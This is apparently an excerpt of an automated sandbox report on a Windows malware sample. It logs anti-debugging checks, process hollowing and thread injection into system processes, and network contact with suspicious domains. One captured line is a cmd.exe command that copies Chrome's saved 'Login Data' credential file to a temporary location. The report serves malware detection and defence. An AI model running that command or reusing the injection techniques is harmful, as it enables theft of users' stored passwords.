                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2138A mov eax, dword ptr fs:[00000030h]17_2_00B2138A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9B390 mov eax, dword ptr fs:[00000030h]17_2_00A9B390
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92397 mov eax, dword ptr fs:[00000030h]17_2_00A92397
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]17_2_00A8DBE9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A903E2 mov eax, dword ptr fs:[00000030h]17_2_00A903E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE53CA mov eax, dword ptr fs:[00000030h]17_2_00AE53CA
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE53CA mov eax, dword ptr fs:[00000030h]17_2_00AE53CA
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2131B mov eax, dword ptr fs:[00000030h]17_2_00B2131B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]17_2_00A6DB60
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A93B7A mov eax, dword ptr fs:[00000030h]17_2_00A93B7A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A93B7A mov eax, dword ptr fs:[00000030h]17_2_00A93B7A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6DB40 mov eax, dword ptr fs:[00000030h]17_2_00A6DB40
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38B58 mov eax, dword ptr fs:[00000030h]17_2_00B38B58
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6F358 mov eax, dword ptr fs:[00000030h]17_2_00A6F358
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7849B mov eax, dword ptr fs:[00000030h]17_2_00A7849B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B214FB mov eax, dword ptr fs:[00000030h]17_2_00B214FB
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]17_2_00AE6CF0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]17_2_00AE6CF0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]17_2_00AE6CF0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38CD6 mov eax, dword ptr fs:[00000030h]17_2_00B38CD6
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9BC2C mov eax, dword ptr fs:[00000030h]17_2_00A9BC2C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6C0A mov eax, dword ptr fs:[00000030h]17_2_00AE6C0A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6C0A mov eax, dword ptr fs:[00000030h]17_2_00AE6C0A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6C0A mov eax, dword ptr fs:[00000030h]17_2_00AE6C0A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6C0A mov eax, dword ptr fs:[00000030h]17_2_00AE6C0A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21C06 mov eax, dword ptr fs:[00000030h]17_2_00B21C06
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3740D mov eax, dword ptr fs:[00000030h]17_2_00B3740D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3740D mov eax, dword ptr fs:[00000030h]17_2_00B3740D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3740D mov eax, dword ptr fs:[00000030h]17_2_00B3740D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8746D mov eax, dword ptr fs:[00000030h]17_2_00A8746D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A44B mov eax, dword ptr fs:[00000030h]17_2_00A9A44B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFC450 mov eax, dword ptr fs:[00000030h]17_2_00AFC450
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFC450 mov eax, dword ptr fs:[00000030h]17_2_00AFC450
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A935A1 mov eax, dword ptr fs:[00000030h]17_2_00A935A1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A91DB5 mov eax, dword ptr fs:[00000030h]17_2_00A91DB5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A91DB5 mov eax, dword ptr fs:[00000030h]17_2_00A91DB5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A91DB5 mov eax, dword ptr fs:[00000030h]17_2_00A91DB5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B305AC mov eax, dword ptr fs:[00000030h]17_2_00B305AC
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B305AC mov eax, dword ptr fs:[00000030h]17_2_00B305AC
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92581 mov eax, dword ptr fs:[00000030h]17_2_00A92581
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92581 mov eax, dword ptr fs:[00000030h]17_2_00A92581
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92581 mov eax, dword ptr fs:[00000030h]17_2_00A92581
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92581 mov eax, dword ptr fs:[00000030h]17_2_00A92581
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A62D8A mov eax, dword ptr fs:[00000030h]17_2_00A62D8A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A62D8A mov eax, dword ptr fs:[00000030h]17_2_00A62D8A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A62D8A mov eax, dword ptr fs:[00000030h]17_2_00A62D8A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A62D8A mov eax, dword ptr fs:[00000030h]17_2_00A62D8A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A62D8A mov eax, dword ptr fs:[00000030h]17_2_00A62D8A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9FD9B mov eax, dword ptr fs:[00000030h]17_2_00A9FD9B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9FD9B mov eax, dword ptr fs:[00000030h]17_2_00A9FD9B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B18DF1 mov eax, dword ptr fs:[00000030h]17_2_00B18DF1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]17_2_00A7D5E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]17_2_00A7D5E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]17_2_00B2FDE2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]17_2_00B2FDE2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]17_2_00B2FDE2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]17_2_00B2FDE2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]17_2_00AE6DC9
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38D34 mov eax, dword ptr fs:[00000030h]17_2_00B38D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2E539 mov eax, dword ptr fs:[00000030h]17_2_00B2E539
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94D3B mov eax, dword ptr fs:[00000030h]17_2_00A94D3B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94D3B mov eax, dword ptr fs:[00000030h]17_2_00A94D3B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94D3B mov eax, dword ptr fs:[00000030h]17_2_00A94D3B
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A73D34 mov eax, dword ptr fs:[00000030h]17_2_00A73D34
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6AD30 mov eax, dword ptr fs:[00000030h]17_2_00A6AD30
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AEA537 mov eax, dword ptr fs:[00000030h]17_2_00AEA537
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8C577 mov eax, dword ptr fs:[00000030h]17_2_00A8C577
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8C577 mov eax, dword ptr fs:[00000030h]17_2_00A8C577
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA3D43 mov eax, dword ptr fs:[00000030h]17_2_00AA3D43
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE3540 mov eax, dword ptr fs:[00000030h]17_2_00AE3540
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B13D40 mov eax, dword ptr fs:[00000030h]17_2_00B13D40
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A87D50 mov eax, dword ptr fs:[00000030h]17_2_00A87D50
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE46A7 mov eax, dword ptr fs:[00000030h]17_2_00AE46A7
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B30EA5 mov eax, dword ptr fs:[00000030h]17_2_00B30EA5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B30EA5 mov eax, dword ptr fs:[00000030h]17_2_00B30EA5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B30EA5 mov eax, dword ptr fs:[00000030h]17_2_00B30EA5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFFE87 mov eax, dword ptr fs:[00000030h]17_2_00AFFE87
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A776E2 mov eax, dword ptr fs:[00000030h]17_2_00A776E2
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A916E0 mov ecx, dword ptr fs:[00000030h]17_2_00A916E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38ED6 mov eax, dword ptr fs:[00000030h]17_2_00B38ED6
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A936CC mov eax, dword ptr fs:[00000030h]17_2_00A936CC
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]17_2_00AA8EC7
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]17_2_00B1FEC0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6E620 mov eax, dword ptr fs:[00000030h]17_2_00A6E620
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1FE3F mov eax, dword ptr fs:[00000030h]17_2_00B1FE3F
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6C600 mov eax, dword ptr fs:[00000030h]17_2_00A6C600
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6C600 mov eax, dword ptr fs:[00000030h]17_2_00A6C600
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6C600 mov eax, dword ptr fs:[00000030h]17_2_00A6C600
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A98E00 mov eax, dword ptr fs:[00000030h]17_2_00A98E00
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A61C mov eax, dword ptr fs:[00000030h]17_2_00A9A61C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A61C mov eax, dword ptr fs:[00000030h]17_2_00A9A61C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B21608 mov eax, dword ptr fs:[00000030h]17_2_00B21608
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7766D mov eax, dword ptr fs:[00000030h]17_2_00A7766D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AE73 mov eax, dword ptr fs:[00000030h]17_2_00A8AE73
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AE73 mov eax, dword ptr fs:[00000030h]17_2_00A8AE73
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AE73 mov eax, dword ptr fs:[00000030h]17_2_00A8AE73
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AE73 mov eax, dword ptr fs:[00000030h]17_2_00A8AE73
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8AE73 mov eax, dword ptr fs:[00000030h]17_2_00A8AE73
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A77E41 mov eax, dword ptr fs:[00000030h]17_2_00A77E41
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2AE44 mov eax, dword ptr fs:[00000030h]17_2_00B2AE44
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2AE44 mov eax, dword ptr fs:[00000030h]17_2_00B2AE44
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A78794 mov eax, dword ptr fs:[00000030h]17_2_00A78794
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7794 mov eax, dword ptr fs:[00000030h]17_2_00AE7794
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7794 mov eax, dword ptr fs:[00000030h]17_2_00AE7794
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7794 mov eax, dword ptr fs:[00000030h]17_2_00AE7794
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA37F5 mov eax, dword ptr fs:[00000030h]17_2_00AA37F5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A64F2E mov eax, dword ptr fs:[00000030h]17_2_00A64F2E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A64F2E mov eax, dword ptr fs:[00000030h]17_2_00A64F2E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9E730 mov eax, dword ptr fs:[00000030h]17_2_00A9E730
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A70E mov eax, dword ptr fs:[00000030h]17_2_00A9A70E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A70E mov eax, dword ptr fs:[00000030h]17_2_00A9A70E
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3070D mov eax, dword ptr fs:[00000030h]17_2_00B3070D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B3070D mov eax, dword ptr fs:[00000030h]17_2_00B3070D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8F716 mov eax, dword ptr fs:[00000030h]17_2_00A8F716
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFFF10 mov eax, dword ptr fs:[00000030h]17_2_00AFFF10
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFFF10 mov eax, dword ptr fs:[00000030h]17_2_00AFFF10
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7FF60 mov eax, dword ptr fs:[00000030h]17_2_00A7FF60
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38F6A mov eax, dword ptr fs:[00000030h]17_2_00B38F6A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7EF40 mov eax, dword ptr fs:[00000030h]17_2_00A7EF40
                Source: C:\Users\user\Desktop\WZ454554.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_0040ACF0 LdrLoadDll,9_2_0040ACF0

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\explorer.exeDomain query: www.sentlogisticsja.com
                Source: C:\Windows\explorer.exeDomain query: www.senerants.tech
                Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
                Sample uses process hollowing techniqueShow sources
                Source: C:\Users\user\Desktop\WZ454554.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: A50000Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D80000Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: A50000Jump to behavior
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\WZ454554.exeMemory written: C:\Users\user\Desktop\WZ454554.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeMemory written: C:\Users\user\Contacts\Hyrzbcwcas.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeMemory written: C:\Users\user\Contacts\Hyrzbcwcas.exe base: 400000 value starts with: 4D5AJump to behavior
                Queues an APC in another process (thread injection)Show sources
                Source: C:\Users\user\Desktop\WZ454554.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                Modifies the context of a thread in another process (thread injection)Show sources
                Source: C:\Users\user\Desktop\WZ454554.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeThread register set: target process: 3352Jump to behavior
                Source: C:\Users\user\Desktop\WZ454554.exeProcess created: C:\Users\user\Desktop\WZ454554.exe C:\Users\user\Desktop\WZ454554.exeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exeJump to behavior
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeProcess created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
                Source: explorer.exe, 0000000A.00000000.366511716.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.327643943.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.342979702.00000000011E0000.00000002.00020000.sdmp, help.exe, 00000014.00000002.561250634.0000000004780000.00000002.00020000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 0000000A.00000000.365734775.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.342284425.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.327386251.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
